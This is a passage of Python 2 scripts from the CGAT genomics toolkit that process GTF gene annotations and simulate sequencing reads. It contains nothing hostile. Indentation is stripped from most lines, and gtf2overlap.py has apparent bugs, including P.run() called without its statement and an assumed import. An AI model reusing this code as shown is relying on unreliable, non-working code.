map_old2new[key] = options.pattern % (len(map_old2new) + 1)
gtf.setAttribute("gene_id", map_old2new[key])
options.stdout.write("%s\n" % str(gtf))
noutput += 1
elif options.method == "renumber-transcripts":
map_old2new = {}
for gtf in GTF.iterator(options.stdin):
ninput += 1
key = (gtf.gene_id, gtf.transcript_id)
if key not in map_old2new:
map_old2new[key] = options.pattern % (
len(map_old2new) + 1)
gtf.setAttribute("transcript_id", map_old2new[key])
options.stdout.write("%s\n" % str(gtf))
noutput += 1
elif options.method == "transcripts2genes":
transcripts = set()
genes = set()
ignore_strand = options.ignore_strand
for gtfs in GTF.iterator_transcripts2genes(
GTF.iterator(options.stdin)):
ninput += 1
for gtf in gtfs:
if ignore_strand:
gtf.strand = "."
options.stdout.write("%s\n" % str(gtf))
transcripts.add(gtf.transcript_id)
genes.add(gtf.gene_id)
nfeatures += 1
noutput += 1
E.info("transcripts2genes: transcripts=%i, genes=%i" %
(len(transcripts), len(genes)))
elif options.method in ("rename-genes", "rename-transcripts"):
map_old2new = IOTools.readMap(
IOTools.openFile(options.filename_filter, "r"))
if options.method == "rename-transcripts":
is_gene_id = False
elif options.method == "rename-genes":
is_gene_id = True
for gff in GTF.iterator(options.stdin):
ninput += 1
if is_gene_id:
if gff.gene_id in map_old2new:
gff.setAttribute("gene_id", map_old2new[gff.gene_id])
else:
E.debug("removing missing gene_id %s" % gff.gene_id)
ndiscarded += 1
continue
else:
if gff.transcript_id in map_old2new:
gff.setAttribute(
"transcript_id", map_old2new[gff.transcript_id])
else:
E.debug("removing missing transcript_id %s" %
gff.transcript_id)
ndiscarded += 1
continue
noutput += 1
options.stdout.write("%s\n" % str(gff))
elif options.method == "filter":
keep_genes = set()
if options.filter_method == "longest-gene":
iterator = GTF.flat_gene_iterator(GTF.iterator(options.stdin))
coords = []
gffs = []
for gff in iterator:
gff.sort(key=lambda x: x.start)
coords.append((gff[0].contig,
min([x.start for x in gff]),
max([x.end for x in gff]),
gff[0].gene_id))
gffs.append(gff)
coords.sort()
last_contig = None
max_end = 0
longest_gene_id = None
longest_length = None
for contig, start, end, gene_id in coords:
ninput += 1
if contig != last_contig or start >= max_end:
if longest_gene_id:
keep_genes.add(longest_gene_id)
longest_gene_id = gene_id
longest_length = end - start
max_end = end
else:
if end - start > longest_length:
longest_length, longest_gene_id = end - start, gene_id
last_contig = contig
max_end = max(max_end, end)
keep_genes.add(longest_gene_id)
invert = options.invert_filter
for gff in gffs:
keep = gff[0].gene_id in keep_genes
if (keep and not invert) or (not keep and invert):
noutput += 1
for g in gff:
nfeatures += 1
options.stdout.write("%s\n" % g)
else:
ndiscarded += 1
elif options.filter_method in ("longest-transcript",
"representative-transcript"):
iterator = GTF.gene_iterator(GTF.iterator(options.stdin))
def selectLongestTranscript(gene):
r = []
for transcript in gene:
transcript.sort(key=lambda x: x.start)
length = transcript[-1].end - transcript[0].start
r.append((length, transcript))
r.sort()
return r[-1][1]
def selectRepresentativeTranscript(gene):
                '''select a representative transcript.
                The representative transcript is the transcript whose
                exons occur most often across all transcripts of the gene.
                '''
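                # Hedged example (exons made up): for transcripts
                # T1=(e1,e2), T2=(e1,e3), T3=(e1,e2) the exon counts are
                # e1:3, e2:2, e3:1, giving scores T1=5, T2=4, T3=5; ties
                # are broken by transcript_id, so one of T1/T3 is returned.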
all_exons = []
for transcript in gene:
all_exons.extend([(x.start, x.end)
for x in transcript
if x.feature == "exon"])
exon_counts = {}
                for key, exons in itertools.groupby(sorted(all_exons)):
exon_counts[key] = len(list(exons))
transcript_counts = []
for transcript in gene:
count = sum([exon_counts[(x.start, x.end)]
for x in transcript if x.feature == "exon"])
# add transcript id to sort to provide a stable
# segmentation.
transcript_counts.append((count,
transcript[0].transcript_id,
transcript))
transcript_counts.sort()
return transcript_counts[-1][-1]
if options.filter_method == "longest-transcript":
_select = selectLongestTranscript
elif options.filter_method == "representative-transcript":
_select = selectRepresentativeTranscript
for gene in iterator:
ninput += 1
# sort in order to make reproducible which
# gene is chosen.
transcript = _select(sorted(gene))
noutput += 1
for g in transcript:
nfeatures += 1
options.stdout.write("%s\n" % g)
elif options.filter_method in ("gene", "transcript"):
if options.filename_filter:
ids = IOTools.readList(
IOTools.openFile(options.filename_filter, "r"))
E.info("read %i ids" % len(ids))
ids = set(ids)
by_gene = options.filter_method == "gene"
by_transcript = options.filter_method == "transcript"
invert = options.invert_filter
ignore_strand = options.ignore_strand
for gff in GTF.iterator(options.stdin):
ninput += 1
keep = False
if by_gene:
keep = gff.gene_id in ids
if by_transcript:
keep = gff.transcript_id in ids
if (invert and keep) or (not invert and not keep):
continue
if ignore_strand:
gff.strand = "."
options.stdout.write("%s\n" % str(gff))
nfeatures += 1
noutput += 1
elif options.sample_size:
if options.filter_method == "gene":
iterator = GTF.flat_gene_iterator(
GTF.iterator(options.stdin))
elif options.filter_method == "transcript":
iterator = GTF.transcript_iterator(
GTF.iterator(options.stdin))
if options.min_exons_length:
iterator = GTF.iterator_min_feature_length(
iterator,
min_length=options.min_exons_length,
feature="exon")
data = [x for x in iterator]
ninput = len(data)
if len(data) > options.sample_size:
data = random.sample(data, options.sample_size)
for d in data:
noutput += 1
for dd in d:
nfeatures += 1
options.stdout.write(str(dd) + "\n")
else:
                assert False, ("please supply either a filename "
                               "with ids to filter with (--map-tsv-file) "
                               "or a sample-size.")
elif options.filter_method in ("proteincoding", "lincrna",
"processed-pseudogene"):
# extract entries by transcript/gene biotype.
            # This filter uses a test on the source field (ENSEMBL pre v78)
            # or a regular expression on the attributes (ENSEMBL >= v78).
tag = {"proteincoding": "protein_coding",
"processed-pseudogene": "processed_pseudogene",
"lincrna": "lincRNA"}[options.filter_method]
rx = re.compile('"%s"' % tag)
if not options.invert_filter:
f = lambda x: x.source == tag or rx.search(x.attributes)
else:
f = lambda x: x.source != tag and not rx.search(x.attributes)
for gff in GTF.iterator(options.stdin):
ninput += 1
if f(gff):
options.stdout.write(str(gff) + "\n")
noutput += 1
else:
ndiscarded += 1
elif options.method == "exons2introns":
for gffs in GTF.flat_gene_iterator(GTF.iterator(options.stdin)):
ninput += 1
cds_ranges = GTF.asRanges(gffs, "CDS")
exon_ranges = GTF.asRanges(gffs, "exon")
input_ranges = Intervals.combine(cds_ranges + exon_ranges)
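            # introns are the gaps between consecutive merged exon/CDS intervals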
if len(input_ranges) > 1:
last = input_ranges[0][1]
output_ranges = []
for start, end in input_ranges[1:]:
output_ranges.append((last, start))
last = end
if options.intron_border:
b = options.intron_border
output_ranges = [(x[0] + b, x[1] - b)
for x in output_ranges]
if options.intron_min_length:
l = options.intron_min_length
output_ranges = [
x for x in output_ranges if x[1] - x[0] > l]
for start, end in output_ranges:
entry = GTF.Entry()
entry.copy(gffs[0])
entry.clearAttributes()
entry.transcript_id = "merged"
entry.feature = "intron"
entry.start = start
entry.end = end
options.stdout.write("%s\n" % str(entry))
nfeatures += 1
noutput += 1
else:
ndiscarded += 1
elif options.method == "set-score-to-distance":
for gffs in GTF.transcript_iterator(GTF.iterator(options.stdin)):
ninput += 1
strand = Genomics.convertStrand(gffs[0].strand)
all_start, all_end = min([x.start for x in gffs]), max(
[x.end for x in gffs])
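            # for stranded transcripts, set each feature's score to its
            # cumulative distance from the transcript's 5' end (minus-strand
            # features are walked in reverse so the distance follows the strand)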
if strand != ".":
t = 0
if strand == "-":
gffs.reverse()
for gff in gffs:
gff.score = t
t += gff.end - gff.start
if strand == "-":
gffs.reverse()
for gff in gffs:
options.stdout.write("%s\n" % str(gff))
nfeatures += 1
noutput += 1
elif options.method == "remove-overlapping":
index = GTF.readAndIndex(
GTF.iterator(IOTools.openFile(options.filename_gff, "r")))
for gffs in GTF.transcript_iterator(GTF.iterator(options.stdin)):
ninput += 1
found = False
for e in gffs:
if index.contains(e.contig, e.start, e.end):
found = True
break
if found:
ndiscarded += 1
else:
noutput += 1
for e in gffs:
nfeatures += 1
options.stdout.write("%s\n" % str(e))
elif options.method == "intersect-transcripts":
for gffs in GTF.gene_iterator(GTF.iterator(options.stdin),
strict=options.strict):
ninput += 1
r = []
for g in gffs:
if options.with_utr:
ranges = GTF.asRanges(g, "exon")
else:
ranges = GTF.asRanges(g, "CDS")
r.append(ranges)
result = r[0]
for x in r[1:]:
result = Intervals.intersect(result, x)
entry = GTF.Entry()
entry.copy(gffs[0][0])
entry.clearAttributes()
entry.transcript_id = "merged"
entry.feature = "exon"
for start, end in result:
entry.start = start
entry.end = end
options.stdout.write("%s\n" % str(entry))
nfeatures += 1
noutput += 1
elif "rename-duplicates" == options.method:
# note: this will only rename entries with "CDS" in feature column
assert options.duplicate_feature in ["gene", "transcript", "both"],\
("for renaming duplicates, --duplicate-feature must be set to one "
"of 'gene', transcript' or 'both'")
gene_ids = list()
transcript_ids = list()
gtfs = list()
for gtf in GTF.iterator(options.stdin):
gtfs.append(gtf)
if gtf.feature == "CDS":
gene_ids.append(gtf.gene_id)
transcript_ids.append(gtf.transcript_id)
dup_gene = [item for item in set(gene_ids) if gene_ids.count(item) > 1]
dup_transcript = [item for item in set(transcript_ids)
if transcript_ids.count(item) > 1]
E.info("Number of duplicated gene_ids: %i" % len(dup_gene))
E.info("Number of duplicated transcript_ids: %i" % len(dup_transcript))
gene_dict = dict(zip(dup_gene, ([0] * len(dup_gene))))
transcript_dict = dict(zip(dup_transcript,
([0] * len(dup_transcript))))
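        # append a running suffix (".1", ".2", ...) to every duplicated
        # gene_id/transcript_id on CDS features, in order of appearance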
for gtf in gtfs:
if gtf.feature == "CDS":
if options.duplicate_feature in ["both", "gene"]:
if gtf.gene_id in dup_gene:
gene_dict[gtf.gene_id] = gene_dict[gtf.gene_id] + 1
# TS. patch until pysam.ctabixproxies.pyx bugfixed
gtf.attributes = gtf.attributes.strip()
gtf.setAttribute('gene_id',
gtf.gene_id + "." +
str(gene_dict[gtf.gene_id]))
if options.duplicate_feature in ["both", "transcript"]:
if gtf.transcript_id in dup_transcript:
transcript_dict[gtf.transcript_id] = \
transcript_dict[gtf.transcript_id] + 1
# TS. patch until pysam.ctabixproxies.pyx bugfixed
gtf.attributes = gtf.attributes.strip()
gtf.setAttribute(
'transcript_id',
gtf.transcript_id + "." +
str(transcript_dict[gtf.transcript_id]))
options.stdout.write("%s\n" % gtf)
elif options.method in ("merge-exons",
"merge-introns",
"merge-transcripts"):
for gffs in GTF.flat_gene_iterator(
GTF.iterator(options.stdin),
strict=options.strict):
ninput += 1
cds_ranges = GTF.asRanges(gffs, "CDS")
exon_ranges = GTF.asRanges(gffs, "exon")
# sanity checks
strands = set([x.strand for x in gffs])
contigs = set([x.contig for x in gffs])
if len(strands) > 1:
raise ValueError(
"can not merge gene '%s' on multiple strands: %s" % (
gffs[0].gene_id, str(strands)))
if len(contigs) > 1:
raise ValueError(
"can not merge gene '%s' on multiple contigs: %s" % (
gffs[0].gene_id, str(contigs)))
strand = Genomics.convertStrand(gffs[0].strand)
utr_ranges = []
if cds_ranges and options.mark_utr:
cds_start, cds_end = cds_ranges[0][0], cds_ranges[-1][1]
midpoint = (cds_end - cds_start) / 2 + cds_start
utr_ranges = []
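                # classify exonic sequence outside the CDS as 5' or 3' UTR
                # relative to the CDS midpoint, taking strand into account;
                # segments of three bases or fewer are skipped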
for start, end in Intervals.truncate(exon_ranges, cds_ranges):
if end - start > 3:
if strand == ".":
feature = "UTR"
elif strand == "+":
if start < midpoint:
feature = "UTR5"
else:
feature = "UTR3"
elif strand == "-":
if start < midpoint:
feature = "UTR3"
else:
feature = "UTR5"
utr_ranges.append((feature, start, end))
try:
biotypes = [x["gene_biotype"] for x in gffs]
biotype = ":".join(set(biotypes))
except (KeyError, AttributeError):
biotype = None
def output_ranges(ranges, gffs, biotype=None,
use_geneid=False):
result = []
for feature, start, end in ranges:
entry = GTF.Entry()
entry.copy(gffs[0])
entry.clearAttributes()
entry.feature = feature
if use_geneid:
entry.transcript_id = entry.gene_id
else:
entry.transcript_id = "merged"
if biotype:
entry.addAttribute("gene_biotype", biotype)
entry.start = start
entry.end = end
result.append(entry)
return result
result = []
if options.method == "merge-exons":
if options.with_utr:
if options.mark_utr:
result.extend(output_ranges(utr_ranges, gffs, biotype,
options.use_geneid))
r = [("CDS", x, y) for x, y in
Intervals.combineAtDistance(
cds_ranges, options.merge_exons_distance)]
else:
r = [("exon", x, y) for x, y in
Intervals.combineAtDistance(
exon_ranges, options.merge_exons_distance)]
else:
r = [("CDS", x, y) for x, y in
Intervals.combineAtDistance(
cds_ranges, options.merge_exons_distance)]
elif options.method == "merge-transcripts":
if options.with_utr:
r = [("exon", exon_ranges[0][0],
exon_ranges[-1][1])]
elif cds_ranges:
r = [("exon", cds_ranges[0][0],
cds_ranges[-1][1])]
else:
ndiscarded += 1
continue
elif options.method == "merge-introns":
if len(exon_ranges) >= 2:
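                    # the merged record spans from the end of the first exon to
                    # the start of the last exon, i.e. the gene's intronic region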
r = [("exon",
exon_ranges[0][1],
exon_ranges[-1][0])]
else:
ndiscarded += 1
continue
result.extend(output_ranges(r, gffs, biotype, options.use_geneid))
result.sort(key=lambda x: x.start)
for x in result:
options.stdout.write("%s\n" % str(x))
nfeatures += 1
noutput += 1
elif options.method == "find-retained-introns":
for gene in GTF.gene_iterator(GTF.iterator(options.stdin)):
ninput += 1
found_any = False
for intron in find_retained_introns(gene):
found_any = True
options.stdout.write("%s\n" % str(intron))
nfeatures += 1
if found_any:
noutput += 1
elif options.method == "genes-to-unique-chunks":
for gene in GTF.flat_gene_iterator(GTF.iterator(options.stdin)):
ninput += 1
for exon in gene_to_blocks(gene):
options.stdout.write("%s\n" % str(exon))
nfeatures += 1
noutput += 1
else:
raise ValueError("unknown method '%s'" % options.method)
E.info("ninput=%i, noutput=%i, nfeatures=%i, ndiscarded=%i" %
(ninput, noutput, nfeatures, ndiscarded))
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/gtf2overlap.py
```python
import os
import sys
import random
import CGAT.Experiment as E
import CGAT.GTF as GTF
import CGAT.IOTools as IOTools
# note: P.execute()/P.run() are used below but not imported in the original
# file; assuming the CGAT pipeline module provides them
import CGAT.Pipeline as P
from rpy2.robjects import r as R
from rpy2.robjects.vectors import FloatVector
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id: cgat_script_template.py 2871 2010-03-03 10:20:44Z andreas $",
usage=globals()["__doc__"])
parser.add_option("-a", "--first-gtf-file", dest="gtf_a", type="string",
help="supply a gtf file - will compress uncompressed files")
parser.add_option("-b", "--second-gtf-file", dest="gtf_b", type="string",
help="supply a second gtf file - will compress uncompressed files")
parser.add_option("-s", "--scripts-dir", dest="scripts_dir", type="string",
help="supply a location for accessory scripts")
parser.add_option("--no-venn", dest="no_venn", action="store_true",
help="set if no venn is to be drawn")
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
gtf_files = [options.gtf_a, options.gtf_b]
merged_files = []
prefices = []
E.info("merging gtf files")
for gtf in gtf_files:
if gtf.endswith(".gtf.gz"):
outfile = IOTools.snip(gtf, ".gtf.gz") + ".merged.gtf.gz"
prefices.append(IOTools.snip(gtf, ".gtf.gz"))
merged_files.append(outfile)
statement = '''zcat %s | python %s/gtf2gtf.py --method=merge-transcripts --log=%s.log | gzip > %s''' % (
gtf, options.scripts_dir, outfile, outfile)
P.execute(statement)
elif gtf.endswith(".gtf"):
outfile = IOTools.snip(gtf, ".gtf") + ".merged.gtf.gz"
prefices.append(IOTools.snip(gtf, ".gtf"))
merged_files.append(outfile)
statement = '''cat %s | python %s/gtf2gtf.py --method=merge-transcripts --log=%s.log | gzip > %s''' % (
gtf, options.scripts_dir, outfile, outfile)
E.execute(statement)
else:
raise ValueError(
"cannot perform merge on %s: is not a gtf file" % gtf)
for prefix in prefices:
if options.gtf_a.find(prefix) != -1:
gtf_a = prefix + ".merged.gtf.gz"
prefix_a = prefix
elif options.gtf_b.find(prefix) != -1:
gtf_b = prefix + ".merged.gtf.gz"
prefix_b = prefix
E.info("intersecting gtf files")
# intersect the resulting merged files
scriptsdir = options.scripts_dir
intersection_out = "_vs_".join(
[prefix_a, prefix_b]) + ".intersection.gtf.gz"
statement = '''intersectBed -a %(gtf_a)s -b %(gtf_b)s -s -wa
| python %(scriptsdir)s/gtf2gtf.py --method=merge-transcripts --log=log | gzip > %(intersection_out)s'''
P.run()
if not options.no_venn:
E.info("producing venn diagram for %s vs %s..." %
(options.gtf_a, options.gtf_b))
# produce the venn diagram
intersection_file = intersection_out
gtf_a_merged = gtf_a
gtf_b_merged = gtf_b
# create dictionary key
gtf_pair = (gtf_a_merged, gtf_b_merged)
# containers for counts
count_gtf_merged_a = 0
count_gtf_merged_b = 0
count_intersection = 0
# create GTF iterator objects
gtf_iterator_a = GTF.iterator(IOTools.openFile(gtf_pair[0]))
gtf_iterator_b = GTF.iterator(IOTools.openFile(gtf_pair[1]))
gtf_iterator_intersection = GTF.iterator(
IOTools.openFile(intersection_file))
# do the counts for each file
E.info("counting entries in %s" % gtf_a)
for entry in gtf_iterator_a:
count_gtf_merged_a += 1
print "counts for gtf-a: ", count_gtf_merged_a
E.info("counting entries in %s" % gtf_b)
for entry in gtf_iterator_b:
count_gtf_merged_b += 1
print "counts for gtf-b: ", count_gtf_merged_b
E.info("counting entries in %s" % intersection_file)
for entry in gtf_iterator_intersection:
count_intersection += 1
print "counts for intersection: ", count_intersection
        # this is the important bit: build dummy identifier lists so that the
        # two sets share exactly count_intersection elements - gtf-b gets
        # sequential ids, gtf-a reuses the first count_intersection of them and
        # is padded with random values for its non-overlapping remainder
result = {}
E.info("assembling count lists")
result[gtf_pair] = {"gtf-b": map(str, xrange(count_gtf_merged_b)), "gtf-a": map(str, xrange(count_intersection)) +
map(str, [random.random() for i in range(count_intersection, count_gtf_merged_a)])}
R_source = os.path.join(
os.path.abspath(options.scripts_dir), "venn_diagram.R")
R.source(R_source)
prefix_a = prefix_a.replace(".", "_").replace("-", "_")
prefix_b = prefix_b.replace(".", "_").replace("-", "_")
R('''prefix.a <- "%s"''' % prefix_a)
R('''prefix.b <- "%s"''' % prefix_b)
E.info("drawing venn diagram to %s" %
(prefix_a + "_vs_" + prefix_b + ".overlap.png"))
R["venn.diagram2"](R.list(A=result[gtf_pair]["gtf-a"], B=result[gtf_pair]["gtf-b"]), prefix_a + "_vs_" + prefix_b + ".overlap.png", **{'cat.cex': 1.5, 'main.fontfamily': "Arial", 'cat.pos': FloatVector((0, 0)), 'cat.fontfamily': "Arial", 'main.cex': 1.8, 'height': 1000, 'width': 1000, 'cex': 2, 'fontfamily': "Arial", 'lwd': R.c(1, 1), 'fill': R.c(R.rgb(0, 0, 0.5, 0.5), R.rgb(0.5, 0, 0, 0.5)), 'category.names': R.c(prefix_a, prefix_b), 'margin': R.c(0.1, 0.1, 0.1, 0.1)
})
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/gtf2reads.py
```python
import sys
import random
import CGAT.GTF as GTF
import CGAT.Experiment as E
import CGAT.IndexedFasta as IndexedFasta
import CGAT.Genomics as Genomics
import CGAT.SequencePairProperties as SequencePairProperties
import CGAT.Iterators as Iterators
import numpy
import numpy.random
def getMutatedSequence(sequence, divergence):
"""sample number of events from a Poisson distribution.
This is a very hacky, simple mutator that does not take into account
multiple substitutions per site and/or a substitution matrix.
Only use for small divergences.
"""
lsequence = len(sequence)
nmutate = numpy.random.poisson(float(lsequence) * divergence)
sequence = list(sequence.upper())
for pos in random.sample(xrange(lsequence), nmutate):
c = sequence[pos]
x = c
while x == c:
x = random.choice("ACGT")
sequence[pos] = x
return "".join(sequence)
# ------------------------------------------------------------
def main(argv=None):
if argv is None:
argv = sys.argv
parser = E.OptionParser(
version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("-g", "--genome-file", dest="genome_file", type="string",
help="filename with genome [default=%default].")
parser.add_option("-p", "--output-filename-pattern", dest="output_filename_pattern", type="string",
help="OUTPUT filename with histogram information on aggregate coverages [%default].")
parser.add_option("--read-length-mean", dest="read_length_mean", type="float",
help="simulation parameter [default=%default].")
parser.add_option("--read-length-std", dest="read_length_stddev", type="float",
help="simulation parameter [default=%default].")
parser.add_option("--coverage-mean", dest="coverage_mean", type="float",
help="simulation parameter [default=%default].")
parser.add_option("--coverage-std", dest="coverage_stddev", type="float",
help="simulation parameter [default=%default].")
parser.add_option("--ds-mean", dest="ds_mean", type="float",
help="simulation parameter [default=%default].")
parser.add_option("--ds-std", dest="ds_stddev", type="float",
help="simulation parameter [default=%default].")
parser.add_option("--error-mean", dest="error_mean", type="float",
help="simulation parameter [default=%default].")
parser.add_option("--error-std", dest="error_stddev", type="float",
help="simulation parameter [default=%default].")
parser.add_option("--min-read-length", dest="min_read_length", type="int",
help="minimum read length [default=%default].")
parser.add_option("--sample-size", dest="sample_size", type="int",
help="randomly sample from selected transcripts [default=%default].")
parser.add_option("--test", dest="test", type="int",
help="test with # first entries [default=%default].")
parser.add_option("--mode", dest="mode", type="choice",
choices=("genes", "transcripts"),
help="use genes or transcripts [default=%default].")
parser.set_defaults(
genome_file=None,
read_length_mean=200.0,
read_length_stddev=20.0,
coverage_mean=2.0,
coverage_stddev=1.0,
ds_mean=None,
ds_stddev=None,
error_mean=None,
error_stddev=None,
min_read_length=50,
test=None,
mode="transcripts",
output_filename_pattern=None,
output_format_id="%010i",
sample_size=0,
)
(options, args) = E.Start(parser, argv)
assert options.genome_file, "please supply an indexed genome."
if options.output_filename_pattern:
outfile_stats = open(options.output_filename_pattern % "stats", "w")
outfile_stats.write(
"id\tlen\tnreads\tlen_mean\tlen_std\tcov_mean\tcov_std\n")
outfile_map = open(options.output_filename_pattern % "map", "w")
outfile_map.write("id\ttranscript\n")
else:
outfile_stats = None
outfile_map = None
genome = IndexedFasta.IndexedFasta(options.genome_file)
ninput, noutput, nskipped = 0, 0, 0
total_counts, total_read_lengths, total_len = [], [], 0
total_pids = []
total_error_pids = []
if options.mode == "transcripts":
iterator = GTF.transcript_iterator(
GTF.iterator_filtered(GTF.iterator(options.stdin), feature="exon"))
getId = lambda x: x.transcript_id
elif options.mode == "genes":
iterator = GTF.flat_gene_iterator(
GTF.iterator_filtered(GTF.iterator(options.stdin), feature="exon"))
getId = lambda x: x.gene_id
if options.sample_size:
iterator = Iterators.sample(iterator)
if options.ds_mean:
do_mutate = True
pid_calc = SequencePairProperties.SequencePairPropertiesPID()
else:
do_mutate = False
if options.error_mean:
do_error = True
pid_calc = SequencePairProperties.SequencePairPropertiesPID()
else:
do_error = False
for gtfs in iterator:
id = getId(gtfs[0])
try:
sequence = GTF.toSequence(gtfs, genome)
except KeyError, msg:
if options.loglevel >= 2:
options.stdlog.write("# skipping %s: %s\n" % (id, msg))
nskipped += 1
continue
lsequence = len(sequence)
if lsequence <= options.min_read_length * 2:
if options.loglevel >= 2:
options.stdlog.write(
"# skipping %s - sequence is too short: %i\n" % (id, lsequence))
nskipped += 1
continue
ninput += 1
if do_mutate:
new_sequence = getMutatedSequence(sequence, options.ds_mean)
pid_calc.loadPair(sequence, new_sequence)
pid = pid_calc.mPID
total_pids.append(pid)
sequence = new_sequence
else:
pid = 100.0
if options.loglevel >= 2:
options.stdlog.write(
"# processing %s - len=%i\n" % (id, lsequence))
options.stdlog.flush()
total_len += lsequence
lvsequence = lsequence * \
random.gauss(options.coverage_mean, options.coverage_stddev)
covered = 0
counts = numpy.zeros(lsequence)
nreads = 0
error_pids, read_lengths = [], []
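        # draw reads until their summed length reaches the target coverage
        # (transcript length times the sampled per-transcript coverage)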
while covered < lvsequence:
read_length = int(
random.gauss(options.read_length_mean, options.read_length_stddev))
positive = random.randint(0, 1)
if positive:
start = random.randint(0, lsequence)
end = min(lsequence, start + read_length)
else:
end = random.randint(0, lsequence)
start = max(0, end - read_length)
read_length = end - start
if read_length < options.min_read_length:
continue
segment = sequence[start:end]
if not positive:
segment = Genomics.complement(segment)
noutput += 1
if do_error:
new_segment = getMutatedSequence(segment, options.error_mean)
pid_calc.loadPair(segment, new_segment)
pid = pid_calc.mPID
error_pids.append(pid)
segment = new_segment
else:
pid = 100.0
options.stdout.write(
">%s\n%s\n" % (options.output_format_id % noutput, segment))
if outfile_map:
outfile_map.write(
"%s\t%s\n" % (id, options.output_format_id % noutput))
for x in range(start, end):
counts[x] += 1
nreads += 1
covered += read_length
read_lengths.append(read_length)
if options.loglevel >= 2:
options.stdout.write("# transcript %s: len=%i, nreads=%i, len_mean=%.2f, len_std=%.2f, cov_mean=%.2f, cov_stddev=%.2f\n" % (id,
lsequence,
nreads,
numpy.mean(
read_lengths),
numpy.std(
read_lengths),
numpy.mean(
counts),
numpy.std(counts)))
if outfile_stats:
outfile_stats.write("%s\t%i\t%i\t%.2f\t%.2f\t%.2f\t%.2f\n" % (id,
lsequence,
nreads,
numpy.mean(
read_lengths),
numpy.std(
read_lengths),
numpy.mean(
counts),
numpy.std(counts)))
total_counts += list(counts)
total_read_lengths += read_lengths
total_error_pids += error_pids
if options.test and ninput >= options.test:
break
if options.sample_size and ninput >= options.sample_size:
break
if options.loglevel >= 1:
output = ["len=%i, nreads=%i" % (total_len,
noutput)]
output.append("len_mean=%.2f, len_std=%.2f, cov_mean=%.2f, cov_stddev=%.2f" % (
numpy.mean(total_read_lengths),
numpy.std(total_read_lengths),
numpy.mean(total_counts),
numpy.std(total_counts)))
no_uncovered = [x for x in total_counts if x > 0]
output.append("cov0_mean=%.2f, cov0_stddev=%.2f" % (numpy.mean(no_uncovered),
numpy.std(no_uncovered)))
if do_mutate:
output.append("pid_mean=%.2f, pid_std=%.2f" %
(numpy.mean(total_pids), numpy.std(total_pids)))
if do_error:
output.append("pid_error_mean=%.2f, pid_error_std=%.2f" %
(numpy.mean(total_error_pids), numpy.std(total_error_pids)))
options.stdlog.write("# effective: %s\n" % ", ".join(output))
if options.loglevel >= 1:
options.stdlog.write(
"# ninput=%i, noutput=%i, nskipped=%i\n" % (ninput, noutput, nskipped))
E.Stop()
if __name__ == '__main__':
main()
```
#### File: cgat/scripts/gtfs2graph.py
```python
import sys
import CGAT.Experiment as E
import CGAT.GTF as GTF
import CGAT.IOTools as IOTools
import bx.intervals.intersection
import numpy
class Counter:
mPercentFormat = "%5.2f"
def __init__(self, outfile):
self.mOutfile = outfile
def write(self, *args):
self.mOutfile.write("\t".join(args) + "\n")
def getHeader(self):
h = []
for a in ("genes", "exons", "bases"):
for b in ("total", "ovl", "unique"):
for c in ("1", "2"):
h.append("n" + a + "_" + b + c)
for a in ("genes", "exons", "bases"):
for b in ("ovl", "unique"):
for c in ("1", "2"):
h.append("p" + a + "_" + b + c)
return "\t".join(h)
@E.cachedmethod
def buildIndex(self, filename):
"""read and index."""
idx = {}
infile = open(filename, "r")
for e in GTF.readFromFile(infile):
if e.contig not in idx:
idx[e.contig] = bx.intervals.intersection.Intersecter()
idx[e.contig].add_interval(
bx.intervals.Interval(e.start, e.end, value=e))
infile.close()
return idx
def _count(self, filename, idx):
overlapping_genes = set()
genes = set()
# iterate over exons
infile = open(filename, "r")
it = GTF.iterator(infile)
nexons, nexons_overlapping = 0, 0
nbases, nbases_overlapping = 0, 0
for this in it:
nexons += 1
nbases += this.end - this.start
genes.add(this.gene_id)
try:
intervals = idx[this.contig].find(this.start, this.end)
except KeyError:
continue
if len(intervals) == 0:
continue
overlapping_genes.add(this.gene_id)
nexons_overlapping += 1
start, end = this.start, this.end
counts = numpy.zeros(end - start, numpy.int)
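            # count, for every base of this exon, how many intervals of the
            # other gene set cover it; bases with a non-zero count overlap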
for other in intervals:
for x in range(max(start, other.start) - start, min(end, other.end) - start):
counts[x] += 1
nbases_overlapping += sum([1 for x in counts if x > 0])
infile.close()
return len(genes), len(overlapping_genes), nexons, nexons_overlapping, nbases, nbases_overlapping
def run(self, filename1, filename2):
"""count overlap between two gtf files."""
E.info("counting started for %s versus %s" % (filename1, filename2))
idx2 = self.buildIndex(filename2)
(self.mGenes1, self.mGenesOverlapping1,
self.mExons1, self.mExonsOverlapping1,
self.mBases1, self.mBasesOverlapping1 ) = \
self._count(filename1, idx2)
self.mGenesUnique1 = self.mGenes1 - self.mGenesOverlapping1
self.mExonsUnique1 = self.mExons1 - self.mExonsOverlapping1
self.mBasesUnique1 = self.mBases1 - self.mBasesOverlapping1
idx1 = self.buildIndex(filename1)
(self.mGenes2, self.mGenesOverlapping2,
self.mExons2, self.mExonsOverlapping2,
self.mBases2, self.mBasesOverlapping2 ) = \
self._count(filename2, idx1)
self.mGenesUnique2 = self.mGenes2 - self.mGenesOverlapping2
self.mExonsUnique2 = self.mExons2 - self.mExonsOverlapping2
self.mBasesUnique2 = self.mBases2 - self.mBasesOverlapping2
def __str__(self):
return "\t".join(map(str, (
self.mGenes1, self.mGenes2,
self.mGenesOverlapping1, self.mGenesOverlapping2,
self.mGenesUnique1, self.mGenesUnique2,
self.mExons1, self.mExons2,
self.mExonsOverlapping1, self.mExonsOverlapping2,
self.mExonsUnique1, self.mExonsUnique2,
self.mBases1, self.mBases2,
self.mBasesOverlapping1, self.mBasesOverlapping2,
self.mBasesUnique1, self.mBasesUnique2 ) ) ) + "\t" +\
"\t".join(map(lambda x: IOTools.prettyPercent(*x), (
(self.mGenesOverlapping1, self.mGenes1),
(self.mGenesOverlapping2, self.mGenes2),
(self.mGenesUnique1, self.mGenes1),
(self.mGenesUnique2, self.mGenes2),
(self.mExonsOverlapping1, self.mExons1),
(self.mExonsOverlapping2, self.mExons2),
(self.mExonsUnique1, self.mExons1),
(self.mExonsUnique2, self.mExons2),
(self.mBasesOverlapping1, self.mBases1),
(self.mBasesOverlapping2, self.mBases2),
(self.mBasesUnique1, self.mBases1),
